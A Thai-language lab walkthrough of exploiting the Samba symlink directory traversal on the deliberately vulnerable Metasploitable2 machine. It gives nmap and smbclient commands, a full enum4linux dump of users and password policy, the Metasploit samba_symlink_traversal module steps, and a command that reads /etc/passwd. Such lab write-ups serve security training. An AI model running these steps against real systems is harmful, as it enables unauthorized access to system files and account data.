How to exploit Samba Symlink Directory Traversal – Metasploitable2

บทนำ (Overview)

บทความนี้นำเสนอการให้บริการ “SAMBA” ที่เปิดแชร์โฟลเดอร์อย่างไม่ปลอดภัย ทำให้เราสามารถเข้าถึงได้ไปยังไฟล์ระบบที่สำคัญที่ไม่ได้ถูกแชร์ โดยสามารถเข้าถึง “root file system” โดยปราศจากการ  “login” โดยใช้บัญชีผู้ใช้ (Anonymous) เพื่อเข้า writable share

ขั้นตอน (Steps)

  1. ค้นหา “Port” ที่เปิดบริการโดยใช้คำสั่งดังนี้
    nmap -p 1-65535 -T4 -A -v 192.168.1.36
    
  2. ตรวจสอบ “Port”  และ “Version” ของ “SAMBA” จากตัวอย่างคือ
    139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    
  3. ตรวจสอบ “SMB shares” โดยใช้ “Anonymous login” (ไม่ต้องใส่รหัสผ่านกดปุ่ม “enter” ไปเลย ดังนี้)
    smbclient -L //192.168.1.36
    
  4. เราสามารถพบ “Shared Folder” คือ “/tmp” ตามภาพ metasploitable-smb-traversal-01
  5. นอกจากนี้เรายังสามารถใช้คำสั่ง “enum4linux 192.168.1.36” เพื่อตรวจสอบข้อมูลได้เช่น
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jan 23 08:56:27 2017
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.1.36
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ==================================================== 
    |    Enumerating Workgroup/Domain on 192.168.1.36    |
     ==================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================ 
    |    Nbtstat Information for 192.168.1.36    |
     ============================================ 
    Looking up status of 192.168.1.36
    	METASPLOITABLE  <00> -         B <ACTIVE>  Workstation Service
    	METASPLOITABLE  <03> -         B <ACTIVE>  Messenger Service
    	METASPLOITABLE  <20> -         B <ACTIVE>  File Server Service
    	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
    
    	MAC Address = 00-00-00-00-00-00
    
     ===================================== 
    |    Session Check on 192.168.1.36    |
     ===================================== 
    [+] Server 192.168.1.36 allows sessions using username '', password ''
    
     =========================================== 
    |    Getting domain SID for 192.168.1.36    |
     =========================================== 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    
     ====================================== 
    |    OS information on 192.168.1.36    |
     ====================================== 
    [+] Got OS info for 192.168.1.36 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
    [+] Got OS info for 192.168.1.36 from srvinfo:
    	METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
    	platform_id     :	500
    	os version      :	4.9
    	server type     :	0x9a03
    
     ============================= 
    |    Users on 192.168.1.36    |
     ============================= 
    index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games	Name: games	Desc: (null)
    index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody	Name: nobody	Desc: (null)
    index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind	Name: (null)	Desc: (null)
    index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy	Name: proxy	Desc: (null)
    index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog	Name: (null)	Desc: (null)
    index: 0x6 RID: 0xbba acb: 0x00000010 Account: user	Name: just a user,111,,Desc: (null)
    index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data	Name: www-data	Desc: (null)
    index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root	Name: root	Desc: (null)
    index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news	Name: news	Desc: (null)
    index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres	Name: PostgreSQL administrator,,,	Desc: (null)
    index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin	Name: bin	Desc: (null)
    index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail	Name: mail	Desc: (null)
    index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd	Name: (null)	Desc: (null)
    index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd	Name: (null)	Desc: (null)
    index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp	Name: (null)	Desc: (null)
    index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon	Name: daemon	Desc: (null)
    index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd	Name: (null)	Desc: (null)
    index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man	Name: man	Desc: (null)
    index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp	Name: lp	Desc: (null)
    index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql	Name: MySQL Server,,,	Desc: (null)
    index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats	Name: Gnats Bug-Reporting System (admin)	Desc: (null)
    index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid	Name: (null)	Desc: (null)
    index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup	Name: backup	Desc: (null)
    index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin	Name: msfadmin,,,	Desc: (null)
    index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd	Name: (null)	Desc: (null)
    index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys	Name: sys	Desc: (null)
    index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog	Name: (null)	Desc: (null)
    index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix	Name: (null)	Desc: (null)
    index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service	Name: ,,,	Desc: (null)
    index: 0x1e RID: 0x434 acb: 0x00000011 Account: list	Name: Mailing List Manager	Desc: (null)
    index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc	Name: ircd	Desc: (null)
    index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp	Name: (null)	Desc: (null)
    index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55	Name: (null)	Desc: (null)
    index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync	Name: sync	Desc: (null)
    index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp	Name: uucp	Desc: (null)
    
    user:[games] rid:[0x3f2]
    user:[nobody] rid:[0x1f5]
    user:[bind] rid:[0x4ba]
    user:[proxy] rid:[0x402]
    user:[syslog] rid:[0x4b4]
    user:[user] rid:[0xbba]
    user:[www-data] rid:[0x42a]
    user:[root] rid:[0x3e8]
    user:[news] rid:[0x3fa]
    user:[postgres] rid:[0x4c0]
    user:[bin] rid:[0x3ec]
    user:[mail] rid:[0x3f8]
    user:[distccd] rid:[0x4c6]
    user:[proftpd] rid:[0x4ca]
    user:[dhcp] rid:[0x4b2]
    user:[daemon] rid:[0x3ea]
    user:[sshd] rid:[0x4b8]
    user:[man] rid:[0x3f4]
    user:[lp] rid:[0x3f6]
    user:[mysql] rid:[0x4c2]
    user:[gnats] rid:[0x43a]
    user:[libuuid] rid:[0x4b0]
    user:[backup] rid:[0x42c]
    user:[msfadmin] rid:[0xbb8]
    user:[telnetd] rid:[0x4c8]
    user:[sys] rid:[0x3ee]
    user:[klog] rid:[0x4b6]
    user:[postfix] rid:[0x4bc]
    user:[service] rid:[0xbbc]
    user:[list] rid:[0x434]
    user:[irc] rid:[0x436]
    user:[ftp] rid:[0x4be]
    user:[tomcat55] rid:[0x4c4]
    user:[sync] rid:[0x3f0]
    user:[uucp] rid:[0x3fc]
    
     ========================================= 
    |    Share Enumeration on 192.168.1.36    |
     ========================================= 
    WARNING: The "syslog" option is deprecated
    Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
    Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
    
    	Sharename       Type      Comment
    	---------       ----      -------
    	print$          Disk      Printer Drivers
    	tmp             Disk      oh noes!
    	opt             Disk      
    	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
    	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
    
    	Server               Comment
    	---------            -------
    	METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)
    	TC7200-DMS           Samba 3.0.37
    
    	Workgroup            Master
    	---------            -------
    	WORKGROUP            TC7200-DMS
    
    [+] Attempting to map shares on 192.168.1.36
    //192.168.1.36/print$	Mapping: DENIED, Listing: N/A
    //192.168.1.36/tmp	Mapping: OK, Listing: OK
    //192.168.1.36/opt	Mapping: DENIED, Listing: N/A
    //192.168.1.36/IPC$	[E] Can't understand response:
    WARNING: The "syslog" option is deprecated
    Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
    NT_STATUS_NETWORK_ACCESS_DENIED listing \*
    //192.168.1.36/ADMIN$	Mapping: DENIED, Listing: N/A
    
     ==================================================== 
    |    Password Policy Information for 192.168.1.36    |
     ==================================================== 
    
    [+] Attaching to 192.168.1.36 using a NULL share
    
    	[+] Trying protocol 445/SMB...
    
    [+] Found domain(s):
    
    	[+] METASPLOITABLE
    	[+] Builtin
    
    [+] Password Info for Domain: METASPLOITABLE
    
    	[+] Minimum password length: 5
    	[+] Password history length: None
    	[+] Maximum password age: Not Set
    	[+] Password Complexity Flags: 000000
    
    		[+] Domain Refuse Password Change: 0
    		[+] Domain Password Store Cleartext: 0
    		[+] Domain Password Lockout Admins: 0
    		[+] Domain Password No Clear Change: 0
    		[+] Domain Password No Anon Change: 0
    		[+] Domain Password Complex: 0
    
    	[+] Minimum password age: None
    	[+] Reset Account Lockout Counter: 30 minutes
    	[+] Locked Account Duration: 30 minutes
    	[+] Account Lockout Threshold: None
    	[+] Forced Log off Time: Not Set
    
    [+] Retieved partial password policy with rpcclient:
    
    Password Complexity: Disabled
    Minimum Password Length: 0
    
    
     ============================== 
    |    Groups on 192.168.1.36    |
     ============================== 
    
    [+] Getting builtin groups:
    
    [+] Getting builtin group memberships:
    
    [+] Getting local groups:
    
    [+] Getting local group memberships:
    
    [+] Getting domain groups:
    
    [+] Getting domain group memberships:
    
     ======================================================================= 
    |    Users on 192.168.1.36 via RID cycling (RIDS: 500-550,1000-1050)    |
     ======================================================================= 
    [I] Found new SID: S-1-5-21-1042354039-2475377354-766472396
    [+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
    S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
    S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
    S-1-5-21-1042354039-2475377354-766472396-502 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-503 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-504 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-505 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-506 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-507 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-508 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-509 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-510 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-511 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-515 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-516 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-517 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-518 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-519 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-520 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-521 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-522 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-523 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-524 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-525 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-526 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-527 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-528 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-529 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-530 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-531 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-532 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-533 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-534 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-535 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-536 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-537 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-538 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-539 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-540 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-541 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-542 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-543 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-544 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-545 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-546 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-547 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-548 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-549 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-550 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1022 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1023 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1024 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
    S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1028 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1029 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1030 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1032 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1033 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1034 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1035 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1036 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1037 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1038 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1039 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1040 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1042 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1044 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1046 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1047 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1048 *unknown*\*unknown* (8)
    S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
    S-1-5-21-1042354039-2475377354-766472396-1050 *unknown*\*unknown* (8)
    
     ============================================= 
    |    Getting printer info for 192.168.1.36    |
     ============================================= 
    No printers returned.
    
    
    enum4linux complete on Mon Jan 23 08:56:47 2017
    
    
  6. ทดลองเข้าถึง โฟลเดอร์ดังกล่าวโดยใช้คำสั่ง
    smbclient //192.168.1.36/tmp
    

    metasploitable-smb-traversal-02

  7. พบว่าสามารถเข้าถึงได้แต่ไม่สามารถเคลื่อนย้ายไปโฟลเดอร์อื่นใด ๆ ดังนั้นเราจึงใช้ “msfconsole” ในการทำ “directory traversal” ดังนี้
    msfconsole
    use auxiliary/admin/smb/samba_symlink_traversal
    set RHOST 192.168.1.36
    set SMBSHARE tmp
    exploit
    exit
    

    metasploitable-smb-traversal-03

  8. เราพบ “folder” ใหม่เพิ่มเข้ามาคือ “\\192.168.1.36\tmp\rootfs\” ทดลองเข้าถึงอีกครั้งดังนี้ metasploitable-smb-traversal-04
  9. ทดสอบอ่านข้อมูลไฟล์ /etc/passwd ดังนี้
    cd rootfs
    more /etc/passwd
    

    metasploitable-smb-traversal-05

ใส่ความเห็น